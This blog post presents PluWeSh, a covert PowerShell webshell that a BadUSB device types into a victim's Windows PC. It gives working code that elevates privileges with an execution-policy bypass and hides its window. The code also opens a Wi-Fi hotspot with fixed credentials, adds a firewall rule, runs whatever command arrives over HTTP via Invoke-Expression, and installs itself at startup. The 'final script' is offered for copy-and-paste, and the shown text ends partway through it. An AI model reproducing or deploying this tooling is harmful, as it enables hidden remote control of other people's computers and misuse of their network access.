

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;dark&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link href="css/stars.css" rel="stylesheet">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

 <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="A blog about computer science and more. You can find some original projects as well as CTF writeups for challenges !">
  <meta name="author" content="w01f">
  <meta name="keywords" content="blog IT cybersecurity programing coding tutorial CTF writeup security">
  <title>PluWeSh - w01f</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/hybrid.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-101896722-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-101896722-2');
</script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>w01f</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/articles/PluWeSh/Desktop.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">

	   
 	 

            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-11-07 05:27" pubdate>
        November 7, 2020 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.9k words
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      57
       min.
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
	<div id="stars-fade">
            <div id="stars"></div>
            <div id="stars2"></div>
            <div id="stars3"></div>
       </div>

    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">PluWeSh</h1>
            
            <div class="markdown-body" id="post-body">
              <h1 id="PluWeSh"><a href="#PluWeSh" class="headerlink" title="PluWeSh"></a>PluWeSh</h1><h2 id="The-Pluggable-WebShell"><a href="#The-Pluggable-WebShell" class="headerlink" title="The Pluggable WebShell"></a>The Pluggable WebShell</h2><p>(I found that name while I brushed my teeth okay…)</p>
<h3 id="Local-WebShell-with-PowerShell"><a href="#Local-WebShell-with-PowerShell" class="headerlink" title="Local WebShell with PowerShell"></a>Local WebShell with PowerShell</h3><p><img src="/img/articles/PluWeSh/Desktop.png" srcset="/img/loading.gif" alt="Desktop Web Shell"></p>
<p><code>Please, this is for personal use only. Don&#39;t going something stupid and land up in jail.</code></p>
<h2 id="Why"><a href="#Why" class="headerlink" title="Why"></a>Why</h2><p>I used some <a target="_blank" rel="noopener" href="http://digistump.com/products/1">digisparks</a> to create some malicious USB keys, keyboards or mices. And a while ago I saw a new kind of ‘badusb’, which you can control remotely (e.g. connecting to its Wi-Fi to execute payload with your phone), there is Spacehuhn’s <a target="_blank" rel="noopener" href="https://github.com/SpacehuhnTech/WiFiDuck">WifiDuck</a> which is really nice, and also the <a target="_blank" rel="noopener" href="https://o.mg.lol/">O.MG</a> cable. But they cost about $27 and $119.99 respectively.<br>The WifiDuck is too big, and the O. MG cable is too expensive.</p>
<p>I only had a few digispark’s left, which don’t have any embedded wifi module. But with a brain and some powershell, <del>eveything</del> a lot of things are possible !</p>
<p>In general, when you don’t have something you ask somebody for it. The digispark can’t emmit Wi-Fi, so it’s gonna ask sombebody else to do it.<br>You’re gonna say<br><em>Okay, but, it’s nothing but a keyboard…</em><br>Hu hu</p>
<h2 id="Create-an-access-point"><a href="#Create-an-access-point" class="headerlink" title="Create an access point "></a>Create an access point </h2><p>Yes of course, the digispark acts like a keyboard, but with a keyboard you can create a custom access point on your computer extremely easily.</p>
<p>So, here is the powershell script to open a hotspot on a Windows computer.</p>
<div class="hljs"><pre><code class="hljs powershell"><span class="hljs-variable">$connectionProfile</span> = [<span class="hljs-type">Windows.Networking.Connectivity.NetworkInformation</span>,<span class="hljs-type">Windows.Networking.Connectivity</span>,<span class="hljs-type">ContentType</span>=<span class="hljs-type">WindowsRuntime</span>]::GetInternetConnectionProfile()
  <span class="hljs-variable">$tetheringManager</span> = [<span class="hljs-type">Windows.Networking.NetworkOperators.NetworkOperatorTetheringManager</span>,<span class="hljs-type">Windows.Networking.NetworkOperators</span>,<span class="hljs-type">ContentType</span>=<span class="hljs-type">WindowsRuntime</span>]::CreateFromConnectionProfile(<span class="hljs-variable">$connectionProfile</span>)

  <span class="hljs-variable">$configuration</span> = <span class="hljs-built_in">new-object</span> Windows.Networking.NetworkOperators.NetworkOperatorTetheringAccessPointConfiguration
  <span class="hljs-comment">&lt;# SSID for hotspot name</span>
<span class="hljs-comment">       The SSID is encoded using the Microsoft code page for the system s default locale.</span>
<span class="hljs-comment">       This SSID may appear differently in the Windows network selection UI on a system </span>
<span class="hljs-comment">       that uses a different system locale. It is highly recommended that you set the </span>
<span class="hljs-comment">       value using characters from the standard ASCII printable character set to avoid </span>
<span class="hljs-comment">       any cross-locale inconsistencies.</span>
<span class="hljs-comment">  #&gt;</span>
  <span class="hljs-variable">$configuration</span>.Ssid = <span class="hljs-string">&quot;PluWeSh&quot;</span>

  <span class="hljs-comment"># Passphrase (As detailed in the 802.11 specification, a passphrase must contain between 8 and 63 characters in the standard ASCII printable character set.)</span>
  <span class="hljs-variable">$configuration</span>.Passphrase = <span class="hljs-string">&quot;pluweshpass&quot;</span>

  <span class="hljs-comment"># Wifi band (GHz) (0 -&gt; automatic, 1 -&gt; 2.4 GHz, 2 -&gt; 5GHz)</span>
  <span class="hljs-variable">$configuration</span>.Band = <span class="hljs-number">0</span>

  <span class="hljs-comment"># Use above configuration for the new hotspot</span>
  AwaitAction (<span class="hljs-variable">$tetheringManager</span>.ConfigureAccessPointAsync(<span class="hljs-variable">$configuration</span>))


  <span class="hljs-comment"># Start Hotspot</span>
  Await (<span class="hljs-variable">$tetheringManager</span>.StartTetheringAsync()) ([<span class="hljs-type">Windows.Networking.NetworkOperators.NetworkOperatorTetheringOperationResult</span>])</code></pre></div>
<p>I commented the code for you, to make it easier to understand.<br>The default credentials are SSID=<code>PluWeSh</code> PASS=<code>pluweshpass</code></p>
<p>You will have to add the following functions :</p>
<div class="hljs"><pre><code class="hljs powershell"><span class="hljs-comment"># Ben N.&#x27;s await function for IAsyncOperation and IAsyncAction in PowerShell:</span>

<span class="hljs-built_in">Add-Type</span> <span class="hljs-literal">-AssemblyName</span> System.Runtime.WindowsRuntime
<span class="hljs-variable">$asTaskGeneric</span> = ([<span class="hljs-type">System.WindowsRuntimeSystemExtensions</span>].GetMethods() | ? &#123; <span class="hljs-variable">$_</span>.Name <span class="hljs-operator">-eq</span> <span class="hljs-string">&#x27;AsTask&#x27;</span> <span class="hljs-operator">-and</span> <span class="hljs-variable">$_</span>.GetParameters().Count <span class="hljs-operator">-eq</span> <span class="hljs-number">1</span> <span class="hljs-operator">-and</span> <span class="hljs-variable">$_</span>.GetParameters()[<span class="hljs-number">0</span>].ParameterType.Name <span class="hljs-operator">-eq</span> <span class="hljs-string">&#x27;IAsyncOperation`1&#x27;</span> &#125;)[<span class="hljs-number">0</span>]
<span class="hljs-function"><span class="hljs-keyword">Function</span> <span class="hljs-title">Await</span><span class="hljs-params">(<span class="hljs-variable">$WinRtTask</span>, <span class="hljs-variable">$ResultType</span>)</span></span> &#123;
    <span class="hljs-variable">$asTask</span> = <span class="hljs-variable">$asTaskGeneric</span>.MakeGenericMethod(<span class="hljs-variable">$ResultType</span>)
    <span class="hljs-variable">$netTask</span> = <span class="hljs-variable">$asTask</span>.Invoke(<span class="hljs-variable">$null</span>, <span class="hljs-selector-tag">@</span>(<span class="hljs-variable">$WinRtTask</span>))
    <span class="hljs-variable">$netTask</span>.Wait(<span class="hljs-literal">-1</span>) | <span class="hljs-built_in">Out-Null</span>
&#125;

<span class="hljs-function"><span class="hljs-keyword">Function</span> <span class="hljs-title">AwaitAction</span><span class="hljs-params">(<span class="hljs-variable">$WinRtAction</span>)</span></span> &#123;
    <span class="hljs-variable">$asTask</span> = ([<span class="hljs-type">System.WindowsRuntimeSystemExtensions</span>].GetMethods() | ? &#123; <span class="hljs-variable">$_</span>.Name <span class="hljs-operator">-eq</span> <span class="hljs-string">&#x27;AsTask&#x27;</span> <span class="hljs-operator">-and</span> <span class="hljs-variable">$_</span>.GetParameters().Count <span class="hljs-operator">-eq</span> <span class="hljs-number">1</span> <span class="hljs-operator">-and</span> !<span class="hljs-variable">$_</span>.IsGenericMethod &#125;)[<span class="hljs-number">0</span>]
    <span class="hljs-variable">$netTask</span> = <span class="hljs-variable">$asTask</span>.Invoke(<span class="hljs-variable">$null</span>, <span class="hljs-selector-tag">@</span>(<span class="hljs-variable">$WinRtAction</span>))
    <span class="hljs-variable">$netTask</span>.Wait(<span class="hljs-literal">-1</span>) | <span class="hljs-built_in">Out-Null</span>
&#125;</code></pre></div>
<p>Otherwise you will get an error because Windows Runtime methods are asynchronous and use a different async task class than .NET Framework methods. Calling them from PowerShell requires that little extra infrastructure.</p>
<p>Executing this script will open an access point.<br><img src="/img/articles/PluWeSh/AP.png" srcset="/img/loading.gif" alt="Access point"></p>
<p><code>NOTE</code>: With this script the attacker can use the victims internet connection as well.</p>
<h2 id="Open-a-Webshell"><a href="#Open-a-Webshell" class="headerlink" title="Open a Webshell"></a>Open a Webshell</h2><p>On the devices I mentionned at the beginning we can see that they host a website on the local network they create. And the “attacker” browses this website once connected to the device.<br>But I’m not gonna install apache to the “victims” machine, that’s a little bit overkill..<br>But I have Powershell<br>And I found out that it’s possible to create a http listener, which allows to host a website on the local network.</p>
<p>And again, here is the script to open a webshell with powershell :</p>
<div class="hljs"><pre><code class="hljs powershell"><span class="hljs-comment">#Run as administrator</span>
<span class="hljs-keyword">if</span> (!([<span class="hljs-type">Security.Principal.WindowsPrincipal</span>][<span class="hljs-type">Security.Principal.WindowsIdentity</span>]::GetCurrent()).IsInRole([<span class="hljs-type">Security.Principal.WindowsBuiltInRole</span>] <span class="hljs-string">&quot;Administrator&quot;</span>)) &#123; <span class="hljs-built_in">Start-Process</span> powershell.exe <span class="hljs-string">&quot;-NoProfile -ExecutionPolicy Bypass -File `&quot;<span class="hljs-variable">$PSCommandPath</span>`&quot;&quot;</span> <span class="hljs-literal">-Verb</span> RunAs; <span class="hljs-keyword">exit</span> &#125;

<span class="hljs-comment"># Hide terminal</span>
<span class="hljs-variable">$t</span> = <span class="hljs-string">&#x27;[DllImport(&quot;user32.dll&quot;)] public static extern bool ShowWindow(int handle, int state);&#x27;</span>
<span class="hljs-built_in">add-type</span> <span class="hljs-literal">-name</span> win <span class="hljs-literal">-member</span> <span class="hljs-variable">$t</span> <span class="hljs-literal">-namespace</span> native
[<span class="hljs-type">native.win</span>]::ShowWindow(([<span class="hljs-type">System.Diagnostics.Process</span>]::GetCurrentProcess() | <span class="hljs-built_in">Get-Process</span>).MainWindowHandle, <span class="hljs-number">0</span>)

<span class="hljs-comment"># Use System.Web components</span>
<span class="hljs-built_in">Add-Type</span> <span class="hljs-literal">-AssemblyName</span> System.Web

<span class="hljs-comment"># port</span>
<span class="hljs-variable">$port</span> = <span class="hljs-number">1339</span>

<span class="hljs-comment"># Add Firewall rule</span>
netsh advfirewall firewall add rule name=<span class="hljs-string">&quot;<span class="hljs-variable">$</span>(<span class="hljs-variable">$port</span>) ps Server&quot;</span> <span class="hljs-built_in">dir</span>=<span class="hljs-keyword">in</span> action=allow protocol=TCP localport=<span class="hljs-variable">$</span>(<span class="hljs-variable">$port</span>)

<span class="hljs-comment"># listening url (local ip + port).</span>
<span class="hljs-variable">$url</span> = <span class="hljs-string">&quot;http://*:<span class="hljs-variable">$</span>(<span class="hljs-variable">$port</span>)/&quot;</span>

<span class="hljs-comment"># Main template</span>
<span class="hljs-variable">$template</span> = <span class="hljs-string">@&#x27;</span>
<span class="hljs-string">&lt;!DOCTYPE HTML&gt;</span>
<span class="hljs-string">&lt;html&gt;</span>
<span class="hljs-string">    &lt;head&gt;</span>
<span class="hljs-string">        &lt;title&gt;PluWeSh&lt;/title&gt;</span>
<span class="hljs-string">        &lt;meta charset=&quot;UTF-8&quot;&gt;</span>
<span class="hljs-string">        &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;</span>
<span class="hljs-string">        &lt;style type=&quot;text/css&quot;&gt;</span>
<span class="hljs-string">            html, body, #container &#123;height:95%&#125;</span>
<span class="hljs-string">            body &#123;font-family:verdana;line-height:1.5;background-color:#1c1c1c&#125;</span>
<span class="hljs-string">            form, #container, p &#123;align-items:center;display:flex;flex-direction:column;justify-content:center; color:#7d397d;&#125;</span>
<span class="hljs-string">            input, textarea &#123;border:1px solid #306468;border-radius:4px;margin-bottom:10px;padding:4px;background-color: #232029; color:#56829b&#125;</span>
<span class="hljs-string">            input[type=submit] &#123;padding:6px 10px&#125;</span>
<span class="hljs-string">            label, p &#123;font-size:10px;padding-bottom:2px;text-transform:uppercase&#125;</span>
<span class="hljs-string">            h1 &#123;margin-bottom:0px;color: #217f85;&#125;</span>
<span class="hljs-string">        &lt;/style&gt;</span>
<span class="hljs-string">    &lt;/head&gt;</span>
<span class="hljs-string">    &lt;body&gt;</span>
<span class="hljs-string">        &lt;div id=&quot;container&quot;&gt;</span>
<span class="hljs-string">        &lt;h1&gt;PluWeSh&lt;/h1&gt;</span>
<span class="hljs-string">        &lt;h5&gt;The Pluggable WebShell&lt;/h5&gt;</span>
<span class="hljs-string">            &lt;div id=&quot;content&quot;&gt;</span>
<span class="hljs-string">                &#123;page&#125;</span>
<span class="hljs-string">            &lt;/div&gt;</span>
<span class="hljs-string">        &lt;/div&gt;</span>
<span class="hljs-string">    &lt;/body&gt;</span>
<span class="hljs-string">&lt;/html&gt;</span>
<span class="hljs-string">&#x27;@</span>

<span class="hljs-comment"># Command submitting form</span>
<span class="hljs-variable">$form</span> = <span class="hljs-string">@&#x27;</span>
<span class="hljs-string">&lt;form method=&quot;post&quot;&gt;</span>
<span class="hljs-string">    &lt;label for=&quot;cmnd&quot;&gt;Command (Powershell only)&lt;/label&gt;</span>
<span class="hljs-string">    &lt;input type=&quot;textarea&quot; name=&quot;cmnd&quot; value=&quot;&quot; placeholder=&quot;start cmd&quot; required /&gt;</span>
<span class="hljs-string">    &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Submit&quot; /&gt;</span>
<span class="hljs-string">&lt;/form&gt;</span>
<span class="hljs-string"></span>
<span class="hljs-string">&lt;textarea readonly placeholder=&quot;Output...&quot; rows=&quot;8&quot; cols=&quot;40&quot;&gt;</span>
<span class="hljs-string">&#123;rslt&#125;  </span>
<span class="hljs-string">&lt;/textarea&gt;</span>
<span class="hljs-string">&#x27;@</span>


<span class="hljs-comment"># request actions.</span>
<span class="hljs-variable">$routes</span> = <span class="hljs-selector-tag">@</span>&#123;
  <span class="hljs-string">&#x27;GET /&#x27;</span>  = &#123; <span class="hljs-keyword">return</span> (render <span class="hljs-variable">$template</span> <span class="hljs-variable">$form</span>) &#125;
  <span class="hljs-string">&#x27;POST /&#x27;</span> = &#123;
    <span class="hljs-comment"># get post data.</span>
    <span class="hljs-variable">$data</span> = extract <span class="hljs-variable">$request</span>

    <span class="hljs-comment"># get the submitted name.</span>
    <span class="hljs-variable">$cmnd</span> = [<span class="hljs-type">System.Web.HttpUtility</span>]::UrlDecode(<span class="hljs-variable">$data</span>.item(<span class="hljs-string">&#x27;cmnd&#x27;</span>))

    <span class="hljs-comment"># Command execution</span>
    <span class="hljs-variable">$rslt</span> = <span class="hljs-built_in">Invoke-Expression</span> <span class="hljs-variable">$cmnd</span>
    
    <span class="hljs-comment"># render the &#x27;form&#x27; snippet, passing the result.</span>
    <span class="hljs-variable">$page</span> = render <span class="hljs-variable">$form</span> <span class="hljs-selector-tag">@</span>&#123;rslt = <span class="hljs-variable">$rslt</span>&#125;


    <span class="hljs-comment"># embed the snippet into the template.</span>
    <span class="hljs-keyword">return</span> (render <span class="hljs-variable">$template</span> <span class="hljs-variable">$page</span>)
  &#125;
&#125;

<span class="hljs-comment"># embed content into the default template.</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span><span class="hljs-params">(<span class="hljs-variable">$template</span>, <span class="hljs-variable">$content</span>)</span></span> &#123;
  <span class="hljs-comment"># shorthand for rendering the template.</span>
  <span class="hljs-keyword">if</span> (<span class="hljs-variable">$content</span> <span class="hljs-operator">-is</span> [<span class="hljs-built_in">string</span>]) &#123; <span class="hljs-variable">$content</span> = <span class="hljs-selector-tag">@</span>&#123;page = <span class="hljs-variable">$content</span>&#125; &#125;
  <span class="hljs-keyword">if</span> (<span class="hljs-variable">$rslt</span> <span class="hljs-operator">-is</span> [<span class="hljs-built_in">string</span>]) &#123; <span class="hljs-variable">$rslt</span> = <span class="hljs-selector-tag">@</span>&#123;rslt = <span class="hljs-variable">$rslt</span>&#125; &#125;

  <span class="hljs-comment">#check for &#123;xxx&#125;&#x27;s to replace them with the corresponding data</span>
  <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$key</span> <span class="hljs-keyword">in</span> <span class="hljs-variable">$content</span>.keys) &#123;
    <span class="hljs-variable">$template</span> = <span class="hljs-variable">$template</span> <span class="hljs-operator">-replace</span> <span class="hljs-string">&quot;&#123;<span class="hljs-variable">$key</span>&#125;&quot;</span>, <span class="hljs-variable">$content</span>[<span class="hljs-variable">$key</span>]
  &#125;

  <span class="hljs-keyword">return</span> <span class="hljs-variable">$template</span>
&#125;

<span class="hljs-comment"># get post data from the input stream.</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">extract</span><span class="hljs-params">(<span class="hljs-variable">$request</span>)</span></span> &#123;
  <span class="hljs-variable">$length</span> = <span class="hljs-variable">$request</span>.contentlength64
  <span class="hljs-variable">$buffer</span> = <span class="hljs-built_in">new-object</span> <span class="hljs-string">&quot;byte[]&quot;</span> <span class="hljs-variable">$length</span>

  [<span class="hljs-built_in">void</span>]<span class="hljs-variable">$request</span>.inputstream.read(<span class="hljs-variable">$buffer</span>, <span class="hljs-number">0</span>, <span class="hljs-variable">$length</span>)
  <span class="hljs-variable">$body</span> = [<span class="hljs-type">system.text.encoding</span>]::ascii.getstring(<span class="hljs-variable">$buffer</span>)

  <span class="hljs-variable">$data</span> = <span class="hljs-selector-tag">@</span>&#123;&#125;
  <span class="hljs-variable">$body</span>.split(<span class="hljs-string">&#x27;&amp;&#x27;</span>) | %&#123;
    <span class="hljs-variable">$part</span> = <span class="hljs-variable">$_</span>.split(<span class="hljs-string">&#x27;=&#x27;</span>)
    <span class="hljs-variable">$data</span>.add(<span class="hljs-variable">$part</span>[<span class="hljs-number">0</span>], <span class="hljs-variable">$part</span>[<span class="hljs-number">1</span>])

  &#125;

  <span class="hljs-keyword">return</span> <span class="hljs-variable">$data</span>

&#125;

<span class="hljs-comment">#Create listener</span>
<span class="hljs-variable">$listener</span> = <span class="hljs-built_in">new-object</span> system.net.httplistener
<span class="hljs-variable">$listener</span>.prefixes.add(<span class="hljs-variable">$url</span>)
<span class="hljs-variable">$listener</span>.start()



<span class="hljs-keyword">while</span> (<span class="hljs-variable">$listener</span>.islistening) &#123;
  <span class="hljs-variable">$context</span> = <span class="hljs-variable">$listener</span>.getcontext()
  <span class="hljs-variable">$request</span> = <span class="hljs-variable">$context</span>.request
  <span class="hljs-variable">$response</span> = <span class="hljs-variable">$context</span>.response

  <span class="hljs-variable">$pattern</span> = <span class="hljs-string">&quot;&#123;0&#125; &#123;1&#125;&quot;</span> <span class="hljs-operator">-f</span> <span class="hljs-variable">$request</span>.httpmethod, <span class="hljs-variable">$request</span>.url.localpath
  <span class="hljs-variable">$route</span> = <span class="hljs-variable">$routes</span>.get_item(<span class="hljs-variable">$pattern</span>)

  <span class="hljs-keyword">if</span> (<span class="hljs-variable">$route</span> <span class="hljs-operator">-eq</span> <span class="hljs-variable">$null</span>) &#123;
    <span class="hljs-variable">$response</span>.statuscode = <span class="hljs-number">404</span>
  &#125; <span class="hljs-keyword">else</span> &#123;
    <span class="hljs-variable">$content</span> = &amp; <span class="hljs-variable">$route</span>
    <span class="hljs-variable">$buffer</span> = [<span class="hljs-type">system.text.encoding</span>]::utf8.getbytes(<span class="hljs-variable">$content</span>)
    <span class="hljs-variable">$response</span>.contentlength64 = <span class="hljs-variable">$buffer</span>.length
    <span class="hljs-variable">$response</span>.outputstream.write(<span class="hljs-variable">$buffer</span>, <span class="hljs-number">0</span>, <span class="hljs-variable">$buffer</span>.length)
  &#125;

  <span class="hljs-variable">$response</span>.close()
&#125;</code></pre></div>

<p>Now you can host a web shell, and access to the victim’s network by opening an access point.<br>To access the website, you have to enter the victim’s local IP followed by the port.<br>Of course in this case you’ll have to find out that Ip address, but you can make the script send the IP address on the internet. That’s not a problem. If you have a server, you can aslo be notified, and a bunch of other things. Be creative.</p>
<p><code>NOTE</code>: Windows is blocking all the incomming connections, to bypass that the script above adds a firewall rule with the following command :</p>
<div class="hljs"><pre><code class="hljs powershell"><span class="hljs-comment"># Add Firewall rule</span>
netsh advfirewall firewall add rule name=<span class="hljs-string">&quot;<span class="hljs-variable">$</span>(<span class="hljs-variable">$port</span>) ps Server&quot;</span> <span class="hljs-built_in">dir</span>=<span class="hljs-keyword">in</span> action=allow protocol=TCP localport=<span class="hljs-variable">$</span>(<span class="hljs-variable">$port</span>)</code></pre></div>

<h2 id="Startup"><a href="#Startup" class="headerlink" title="Startup"></a>Startup</h2><p>To start the script when Windows turns on, you have to add this few commands :</p>
<div class="hljs"><pre><code class="hljs powershell"><span class="hljs-variable">$ds</span> = [<span class="hljs-type">Environment</span>]::GetFolderPath(<span class="hljs-string">&quot;Startup&quot;</span>);
<span class="hljs-variable">$Wsh</span> = <span class="hljs-built_in">New-Object</span> <span class="hljs-literal">-comObject</span> WScript.Shell
<span class="hljs-variable">$sct</span> = <span class="hljs-variable">$Wsh</span>.CreateShortcut(<span class="hljs-string">&quot;./config.ps1&quot;</span>)
<span class="hljs-variable">$sct</span>.TargetPath = <span class="hljs-string">&quot;<span class="hljs-variable">$ds</span>&quot;</span>
<span class="hljs-variable">$sct</span>.Save()
<span class="hljs-variable">$content</span> = <span class="hljs-string">&#x27;start notepad.exe&#x27;</span>| <span class="hljs-built_in">Out-File</span> <span class="hljs-literal">-FilePath</span> <span class="hljs-variable">$ds</span>\opennotepad.bat</code></pre></div>

<p>The problem is, that by default <code>.ps1</code> scripts are not openened with Powershell, but with a text editor. (or maybe it’s just me..).</p>
<h2 id="Final-script"><a href="#Final-script" class="headerlink" title="Final script"></a>Final script</h2><p>You can copy/paste this script directly, but I hope you understand (at least a bit) what it’s doing.</p>
<div class="hljs"><pre><code class="hljs powershell"><span class="hljs-comment">&lt;# </span>
<span class="hljs-comment">    Imagined by w01f</span>
<span class="hljs-comment">    https://w01f.xyz/</span>
<span class="hljs-comment"></span>
<span class="hljs-comment">    Thank you :)</span>
<span class="hljs-comment"></span>
<span class="hljs-comment">#&gt;</span>

<span class="hljs-comment"># Run as administrator</span>
<span class="hljs-keyword">if</span> (!([<span class="hljs-type">Security.Principal.WindowsPrincipal</span>][<span class="hljs-type">Security.Principal.WindowsIdentity</span>]::GetCurrent()).IsInRole([<span class="hljs-type">Security.Principal.WindowsBuiltInRole</span>] <span class="hljs-string">&quot;Administrator&quot;</span>)) &#123; <span class="hljs-built_in">Start-Process</span> powershell.exe <span class="hljs-string">&quot;-NoProfile -ExecutionPolicy Bypass -File `&quot;<span class="hljs-variable">$PSCommandPath</span>`&quot;&quot;</span> <span class="hljs-literal">-Verb</span> RunAs; <span class="hljs-keyword">exit</span> &#125;

<span class="hljs-variable">$ds</span> = [<span class="hljs-type">Environment</span>]::GetFolderPath(<span class="hljs-string">&quot;Startup&quot;</span>);
<span class="hljs-variable">$Wsh</span> = <span class="hljs-built_in">New-Object</span> <span class="hljs-literal">-comObject</span> WScript.Shell
<span class="hljs-variable">$sct</span> = <span class="hljs-variable">$Wsh</span>.CreateShortcut(<span class="hljs-string">&quot;./config.ps1&quot;</span>)
<span class="hljs-variable">$sct</span>.TargetPath = <span class="hljs-string">&quot;<span class="hljs-variable">$ds</span>&quot;</span>
<span class="hljs-variable">$sct</span>.Save()
<span class="hljs-variable">$content</span> = <span class="hljs-string">&#x27;start notepad.exe&#x27;</span>| <span class="hljs-built_in">Out-File</span> <span class="hljs-literal">-FilePath</span> <span class="hljs-variable">$ds</span>\opennotepad.bat


<span class="hljs-built_in">Add-Type</span> <span class="hljs-literal">-AssemblyName</span> System.Web

<span class="hljs-variable">$t</span> = <span class="hljs-string">&#x27;[DllImport(&quot;user32.dll&quot;)] public static extern bool ShowWindow(int handle, int state);&#x27;</span>
<span class="hljs-built_in">add-type</span> <span class="hljs-literal">-name</span> win <span class="hljs-literal">-member</span> <span class="hljs-variable">$t</span> <span class="hljs-literal">-namespace</span> native
[<span class="hljs-type">native.win</span>]::ShowWindow(([<span class="hljs-type">System.Diagnostics.Process</span>]::GetCurrentProcess() | <span class="hljs-built_in">Get-Process</span>).MainWindowHandle, <span class="hljs-number">0</span>)

<span class="hljs-variable">$configuration</span> = <span class="hljs-built_in">new-object</span> Windows.Networking.NetworkOperators.NetworkOperatorTetheringAccessPointConfiguration

<span class="hljs-comment"># ======================================= configuration: =======================================</span>


<span class="hljs-comment"># Webserver port</span>
<span class="hljs-variable">$port</span> = <span class="hljs-number">1338</span>

<span class="hljs-comment"># Webserver URL</span>
<span class="hljs-variable">$url</span> = <span class="hljs-string">&quot;http://*:<span class="hljs-variable">$</span>(<span class="hljs-variable">$port</span>)/&quot;</span>


<span class="hljs-comment">&lt;# SSID for hotspot name</span>
<span class="hljs-comment">    The SSID is encoded using the Microsoft code page for the system&#x27;s default locale.</span>
<span class="hljs-comment">    This SSID may appear differently in the Windows network selection UI on a system </span>
<span class="hljs-comment">    that uses a different system locale. It is highly recommended that you set the </span>
<span class="hljs-comment">    value using characters from the standard ASCII printable character set to avoid </span>
<span class="hljs-comment">    any cross-locale inconsistencies.</span>
<span class="hljs-comment">#&gt;</span>
<span class="hljs-variable">$configuration</span>.Ssid = <span class="hljs-string">&quot;PluWeSh&quot;</span>

<span class="hljs-comment"># Passphrase (As detailed in the 802.11 specification, a passphrase must contain between 8 and 63 characters in the standard ASCII printable character set.)</span>
<span class="hljs-variable">$configuration</span>.Passphrase = <span class="hljs-string">&quot;pluweshpass&quot;</span>

<span class="hljs-comment"># Wifi band (GHz)</span>
<span class="hljs-comment">&lt;#</span>
<span class="hljs-comment">FIELDS</span>
